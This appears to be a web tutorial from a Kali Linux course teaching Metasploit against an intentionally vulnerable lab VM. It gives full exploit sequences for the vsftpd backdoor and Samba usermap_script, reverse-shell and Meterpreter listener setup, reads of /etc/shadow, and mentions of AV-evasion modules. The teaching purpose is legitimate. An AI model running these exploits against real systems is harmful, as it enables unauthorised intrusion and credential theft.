⚠️ Authorised Lab Use Only: Metasploit Framework must only be used against systems you own or have explicit written authorisation to test. All exercises in this guide target Metasploitable 2 running in your isolated home lab — never a production system. Using Metasploit against unauthorised targets is illegal under the Computer Misuse Act, CFAA, and equivalent laws globally.
On Day 9 we collected intelligence — emails, subdomains, IP ranges — using theHarvester. Today we take the next step in the attack chain and learn what to do with that intelligence. Metasploit Framework is the tool that bridges the gap between “I know this system is vulnerable” and “I have a shell on it.” It is the most widely used penetration testing platform on the planet, and by the end of this metasploit tutorial you will have run your first real exploit and caught your first Meterpreter session in your own lab.
🎯 What You’ll Master in Day 10
Navigate msfconsole and understand the Metasploit module architecture
Search, select, configure and launch exploit modules with correct payloads
Catch and interact with a Meterpreter session in your Metasploitable lab
Use core post-exploitation Meterpreter commands for system information gathering
Understand how auxiliary scanner modules work independently of exploits
⏱️ 26 min read · 3 hands-on exercises
📊 Have you used Metasploit before?
✅ Perfect — this guide covers everything from your first msfconsole command through to post-exploitation. Use the TOC to jump to your level.
📋 What You’ll Master in Day 10 — Metasploit Tutorial
Yesterday on Day 9 we used theHarvester for passive OSINT reconnaissance, building a complete intelligence picture of a target from public sources. Today we shift from intelligence gathering to active exploitation. Metasploit Framework is what professional penetration testers reach for when they have identified a vulnerable service and need to demonstrate real impact — and it lives in the 180-Day Kali Linux Mastery Course as one of the most important tool days in the entire first month.
What Is Metasploit Framework and How It Fits the Attack Chain
Metasploit Framework (MSF) is an open-source penetration testing platform originally created by HD Moore in 2003 and now maintained by Rapid7. It contains over 2,200 exploit modules covering vulnerabilities across Windows, Linux, macOS, network devices, web applications, and more. Every module is purpose-built, well-documented, and follows a consistent interface — meaning once you learn to use one exploit, you know how to use all of them.
In the attack chain context, Metasploit sits at Step 3 — exploitation. You use reconnaissance tools like Nmap and theHarvester to identify targets and services, then Metasploit to exploit the identified vulnerability and gain initial access. Everything that follows — post-exploitation, pivoting, persistence — also has dedicated Metasploit modules to support it. It is truly an end-to-end platform, not just an exploit launcher.
📸 msfconsole loading in Kali Linux 2026 — the ASCII banner confirms the current version and total module count. Over 2,377 exploit modules available out of the box.
💡 Why Metasploit Is Standard: Metasploit is the tool that professional penetration testers reference in every report and every OSCP exam attempt. Understanding its architecture deeply — not just running random exploits — is what separates a professional from a script kiddie. This tutorial builds that deep understanding from the ground up.
🧠 EXERCISE 1 — THINK LIKE A HACKER (2 MIN · NO TOOLS)
Why is Metasploit more than just an exploit launcher?
⏱️ Time: 2 minutes · No tools required
Before running a single Metasploit command, think through this question to build the right mental model:
A penetration tester has found an unpatched vsftpd 2.3.4 service on a target.
They could:
A) Manually write exploit code from scratch
B) Download a PoC from Exploit-DB and adapt it
C) Use the Metasploit module for vsftpd_234_backdoor
Question: When is C the right choice, and when would a professional
prefer A or B? What are the trade-offs of each approach in terms of:
– Speed and efficiency
– Detection by EDR/AV solutions
– Documentation and reproducibility
– Learning depth vs operational effectiveness
✅ What you just learned: Metasploit is the right choice when speed, documentation, and a proven reliable exploit are priorities — which covers 90% of authorised penetration tests. Manual exploitation becomes important when EDR evasion is required, when you need to understand the vulnerability deeply, or when no Metasploit module exists. Professionals use both — knowing when to use each is the skill.
📸 Write your answer and share it in #day10-mindset on Discord. Tag #metasploitday10
🧠 QUICK CHECK — Section 1
In the penetration testing attack chain, where does Metasploit primarily sit?
msfconsole Basics — Navigation, Help and Essential Commands
msfconsole is the primary Metasploit interface. It is a command-line console with tab-completion, command history, and a context-sensitive help system. Learning the core navigation commands takes about ten minutes — after that, the interface gets out of your way and lets you focus on the work.
MSFCONSOLE — ESSENTIAL NAVIGATION COMMANDS
# Launch Metasploit
msfconsole
# Faster start (skip banner, load database):
msfconsole -q
# ─── INSIDE MSFCONSOLE ───
# Get help on any command
help
help search
# Search for modules by keyword, CVE, platform, type
back# unload current module, return to msf6 prompt
exit# exit msfconsole
💡 Tab Completion is Your Best Friend: In msfconsole, pressing Tab after any partial command or module name auto-completes it. Type use exploit/unix/ then Tab twice to see all unix exploits. This is far faster than typing full module paths and essential for efficient workflow.
The Module Architecture — Exploits, Auxiliaries, Payloads, Post
Every piece of functionality in Metasploit is packaged as a module. There are six module types and understanding what each does tells you exactly which type to reach for in any given situation.
securityelites.com
Metasploit Module Architecture — 6 Types
💥 exploit/
Takes advantage of a specific vulnerability. Always paired with a payload. Ranked: Excellent / Great / Good / Normal / Average / Low.
exploit/unix/ftp/vsftpd_234_backdoor
🔍 auxiliary/
Scanners, fuzzers, sniffers, brute forcers — no payload needed. Used for reconnaissance and enumeration.
auxiliary/scanner/portscan/tcp
📦 payload/
Code that runs after a successful exploit. Defines what happens with your access: shell, Meterpreter, command execution.
payload/linux/x86/meterpreter/reverse_tcp
🔧 post/
Post-exploitation modules. Run after getting a shell: privilege escalation, credential harvesting, pivoting setup.
post/multi/recon/local_exploit_suggester
🎭 encoder/
Transforms payloads to avoid signature detection. Used with msfvenom for standalone payload generation.
encoder/x86/shikata_ga_nai
🛡️ evasion/
Generates payloads designed to bypass specific AV/EDR products. More advanced than encoders.
evasion/windows/windows_defender_exe
📸 Metasploit’s six module types — exploits need payloads, auxiliaries work standalone, post modules run after access is established. Understanding this architecture tells you exactly which type to search for in any scenario.
🧠 QUICK CHECK — Section 3
Which Metasploit module type would you use to run an SSH brute force scan without exploiting anything?
Your First Exploit — vsftpd 2.3.4 Against Metasploitable
Metasploitable 2 is an intentionally vulnerable Linux VM designed specifically for Metasploit practice. It runs multiple vulnerable services — including vsftpd 2.3.4, which contains a backdoor deliberately inserted by an attacker who compromised the vsftpd source code in 2011. This makes it a safe, legal, and reliable target for your first Metasploit exploit in your home lab.
⚠️ Lab Network Only: Metasploitable 2 must always run on a host-only or isolated network — never connected to the internet. Its vulnerabilities are real and exploitable. Download from: sourceforge.net/projects/metasploitable/ and configure VirtualBox to host-only network only.
YOUR FIRST EXPLOIT — vsftpd 2.3.4 BACKDOOR
# STEP 1 — Confirm Metasploitable is running and reachable
ping 192.168.56.101# replace with your Metasploitable IP
Run the vsftpd exploit and confirm root access on Metasploitable 2
⏱️ Time: 15 minutes · Target: Metasploitable 2 on your host-only network
Follow the exploit sequence above exactly. The goal is not just to run the commands — it is to understand what each step does and why the vsftpd backdoor exists.
FULL EXPLOIT SEQUENCE WITH VERIFICATION
# Complete sequence — replace IP with your Metasploitable IP
nmap -sV -p 21 192.168.56.101
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
run
id && whoami && cat /etc/passwd | head -5
# Document: what UID are you? What does that mean for access?
# After confirming root — try these commands to explore:
cat /etc/shadow | head -5# password hashes
ls /root# root’s home directory
ifconfig# network interfaces
ps aux | head -20# running processes
✅ What you just learned: A single Metasploit module, configured with one option (RHOSTS), delivered root access to a vulnerable system in under 30 seconds. The vsftpd 2.3.4 backdoor is a real CVE (CVE-2011-2523) that was present in production deployments before being discovered. This is why patch management matters — and why penetration testers check service version numbers so carefully during reconnaissance.
📸 Screenshot your id command showing uid=0(root) and share in #day10-exercise on Discord.
Meterpreter — The Advanced Shell That Stays in Memory
The vsftpd exploit gives you a basic command shell. For professional penetration testing, Meterpreter is the payload of choice — it provides a far richer post-exploitation environment, runs entirely in memory (never writes to disk), encrypts its communications, and supports dozens of built-in post-exploitation commands without requiring additional tools on the target.
GETTING A METERPRETER SESSION — SAMBA EXPLOIT
# Use the Samba exploit on Metasploitable which supports Meterpreter
search type:exploit name:samba usermap_script
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.101
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.1# your Kali IP
run
# For a full Meterpreter session, use multi/handler with a listener:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4444
run -j# run as background job, waiting for connections
📸 Meterpreter session open against Metasploitable — sysinfo confirms target OS, getuid confirms root access, hashdump retrieves all password hashes for offline cracking
Auxiliary Modules — Scanning and Enumeration Without Exploiting
Auxiliary modules are often overlooked in favour of exploits, but they are among the most useful modules in Metasploit for professional assessments. They handle port scanning, service enumeration, brute forcing, vulnerability verification, and protocol fuzzing — all without needing a payload and without creating a session on the target.
🔥 EXERCISE 3 — KALI TERMINAL (METASPLOITABLE — AUXILIARY MODULES)
Run three auxiliary modules against Metasploitable and document the findings
⏱️ Time: 20 minutes · Target: Metasploitable 2 on your host-only network
Use auxiliary modules to enumerate the Metasploitable target without exploiting anything. This is the style of module used during the reconnaissance phase of a professional assessment.
THREE AUXILIARY MODULES — METASPLOITABLE LAB
# MODULE 1: TCP port scanner
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.101
set PORTS 1-1000
set THREADS 50
run
# Document: how many open ports found? Compare to your Nmap results.
# MODULE 2: SSH version scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.56.101
run
# Document: what SSH version is running? Is it vulnerable?
# Document: SMB version, hostname, OS version, domain
# BONUS: Check for SMB vulnerabilities
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.56.101
run
# Is it vulnerable to EternalBlue?
✅ What you just learned: Auxiliary modules let you build a comprehensive target profile inside msfconsole without ever launching an exploit. This is the standard approach for the enumeration phase of a professional assessment — scan with auxiliaries, identify vulnerable services, then select the appropriate exploit module. The scan results also feed directly into your penetration test report.
📸 Screenshot your port scanner output listing open services and share in #day10-auxiliary on Discord. Tag #metasploitday10
🧠 QUICK CHECK — Section 6
What is the key difference between Meterpreter and a standard command shell?
📋 Commands Used Today — Day 10 Reference Card
msfconsole -qLaunch Metasploit (quiet mode, no banner)
search type:exploit name:vsftpdSearch modules by type and name keyword
use exploit/unix/ftp/vsftpd_234_backdoorLoad the vsftpd backdoor exploit module
show optionsDisplay all configurable options for loaded module
set RHOSTS [IP]Set target host(s) — accepts IPs, ranges, CIDR
run / exploitLaunch the configured module
sessions -i 1Interact with session number 1
sysinfoMeterpreter — OS, hostname, architecture info
backgroundBackground current session, return to msf6 prompt
use auxiliary/scanner/portscan/tcpTCP port scanner auxiliary module
🏆 Mark Day 10 as Complete
You ran your first Metasploit exploit and caught your first shell. Lock it in.
❓ Frequently Asked Questions – Metasploit Tutorial Kali Linux 2026
What is Metasploit Framework?
Metasploit Framework is the world’s most widely used open-source penetration testing platform, containing over 2,200 exploit modules, auxiliary scanners, post-exploitation tools, and payload generators. It provides a consistent interface for finding and exploiting vulnerabilities in authorised targets. It comes pre-installed in Kali Linux and is used by professional penetration testers worldwide.
What is msfconsole?
msfconsole is the primary command-line interface for the Metasploit Framework. Launch it by running msfconsole in a Kali terminal. It provides tab-completion, command history, and context-sensitive help. All module loading, configuration, execution, and session management happens from within msfconsole.
What is the difference between an exploit and a payload in Metasploit?
An exploit is the code that takes advantage of a specific vulnerability to gain code execution. A payload is the code that runs after the exploit succeeds — it defines what your access looks like. Common payloads: reverse_tcp (target connects back to you), bind_tcp (you connect to a listener on the target), and Meterpreter (advanced in-memory shell with rich post-exploitation capabilities).
What is Metasploitable 2 and where do I get it?
Metasploitable 2 is an intentionally vulnerable Ubuntu Linux VM designed for Metasploit practice. It runs dozens of vulnerable services including vsftpd 2.3.4, Samba 3.x, PostgreSQL, Tomcat, and more. Download free from sourceforge.net/projects/metasploitable/. Always run it on a host-only network — never internet-connected.
Is Metasploit legal to use?
Metasploit is legal for authorised penetration testing, CTF competitions, security research, and practising in your own lab. Using it against systems you do not own or have explicit written permission to test is illegal. Always ensure you have written authorisation scope documentation before using any offensive tool against any target.
What comes after Metasploit in this course?
Day 11 covers Aircrack-ng — WiFi password cracking and WPA2 handshake capture. The Metasploit skills from Day 10 are revisited extensively in Days 38 (Metasploit Advanced) and throughout the post-exploitation section of the course from Days 25–35 of the Ethical Hacking course track.
← Previous
Day 9: theHarvester Tutorial
Next →
Day 11: Aircrack-ng Tutorial
📚 Further Reading
Metasploit Tutorial for Beginners 2026— The standalone beginner guide covering Metasploit from first principles — complements this course day with additional walkthroughs and CTF-style exercises.
Day 9: theHarvester Tutorial— The reconnaissance step that precedes today’s exploitation — using public OSINT to identify targets before running Metasploit modules.
Ethical Hacking: Exploitation Hub— The complete exploitation category covering manual and automated exploitation techniques beyond Metasploit — the territory of Days 22–30 in the EH course.
Metasploit Documentation — Official Rapid7 Docs— The authoritative reference for all msfconsole commands, module writing, payload generation, and the complete Meterpreter command reference.
OWASP Vulnerable Applications Directory— A curated list of intentionally vulnerable applications for practising Metasploit and other techniques beyond Metasploitable 2.
ME
Mr Elite
Owner, SecurityElites.com
I remember the exact moment I ran my first Metasploit exploit successfully — the green text scrolling, the shell prompt appearing, running id and seeing uid=0(root). It was a completely different kind of learning from reading about vulnerabilities. That tactile moment of actually landing a shell is what converts theory into real skill. I designed this entire 180-day course to give every student that same progression — starting here with Metasploit fundamentals and building methodically through post-exploitation, pivoting, and advanced techniques over the weeks that follow.
Leave a Reply